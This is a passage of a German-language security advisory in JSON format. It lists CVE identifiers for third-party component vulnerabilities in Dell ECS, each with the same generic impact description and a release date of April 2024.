"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0361"
},
{
"cve": "CVE-2022-0392",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0392"
},
{
"cve": "CVE-2022-0407",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0407"
},
{
"cve": "CVE-2022-0413",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0413"
},
{
"cve": "CVE-2022-0561",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0561"
},
{
"cve": "CVE-2022-0696",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0696"
},
{
"cve": "CVE-2022-0778",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-0778"
},
{
"cve": "CVE-2022-1184",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1184"
},
{
"cve": "CVE-2022-1245",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1245"
},
{
"cve": "CVE-2022-1271",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1271"
},
{
"cve": "CVE-2022-1292",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1292"
},
{
"cve": "CVE-2022-1381",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1381"
},
{
"cve": "CVE-2022-1420",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1420"
},
{
"cve": "CVE-2022-1462",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1462"
},
{
"cve": "CVE-2022-1466",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1466"
},
{
"cve": "CVE-2022-1471",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1471"
},
{
"cve": "CVE-2022-1586",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1586"
},
{
"cve": "CVE-2022-1587",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1587"
},
{
"cve": "CVE-2022-1616",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1616"
},
{
"cve": "CVE-2022-1619",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1619"
},
{
"cve": "CVE-2022-1620",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1620"
},
{
"cve": "CVE-2022-1679",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1679"
},
{
"cve": "CVE-2022-1705",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1705"
},
{
"cve": "CVE-2022-1720",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1720"
},
{
"cve": "CVE-2022-1729",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1729"
},
{
"cve": "CVE-2022-1733",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1733"
},
{
"cve": "CVE-2022-1735",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1735"
},
{
"cve": "CVE-2022-1771",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1771"
},
{
"cve": "CVE-2022-1785",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1785"
},
{
"cve": "CVE-2022-1796",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1796"
},
{
"cve": "CVE-2022-1851",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1851"
},
{
"cve": "CVE-2022-1897",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1897"
},
{
"cve": "CVE-2022-1898",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1898"
},
{
"cve": "CVE-2022-1927",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1927"
},
{
"cve": "CVE-2022-1962",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1962"
},
{
"cve": "CVE-2022-1968",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1968"
},
{
"cve": "CVE-2022-1974",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1974"
},
{
"cve": "CVE-2022-1975",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-1975"
},
{
"cve": "CVE-2022-20132",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-20132"
},
{
"cve": "CVE-2022-20141",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-20141"
},
{
"cve": "CVE-2022-20154",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-20154"
},
{
"cve": "CVE-2022-20166",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-20166"
},
{
"cve": "CVE-2022-20368",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-20368"
},
{
"cve": "CVE-2022-20369",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-20369"
},
{
"cve": "CVE-2022-2047",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2047"
},
{
"cve": "CVE-2022-2048",
"notes": [
{
"category": "description",
"text": "In Dell ECS existieren mehrere Schwachstellen. Diese bestehen in diversen Komponenten von Drittanbietern. Ein Angreifer kann diese Schwachstellen ausnutzen, um seine Privilegien zu erweitern, beliebigen Programmcode mit Administratorrechten auszuf\u00fchren, Informationen offenzulegen, Dateien zu manipulieren, einen Cross-Site-Scripting-Angriff durchzuf\u00fchren, Sicherheitsvorkehrungen zu umgehen oder einen Denial of Service Zustand herbeizuf\u00fchren."
}
],
"product_status": {
"known_affected": [
"T033919"
]
},
"release_date": "2024-04-04T22:00:00.000+00:00",
"title": "CVE-2022-2048"
},
{
"cve": "CVE-2022-20567",
"notes": [
{
"category": "description",
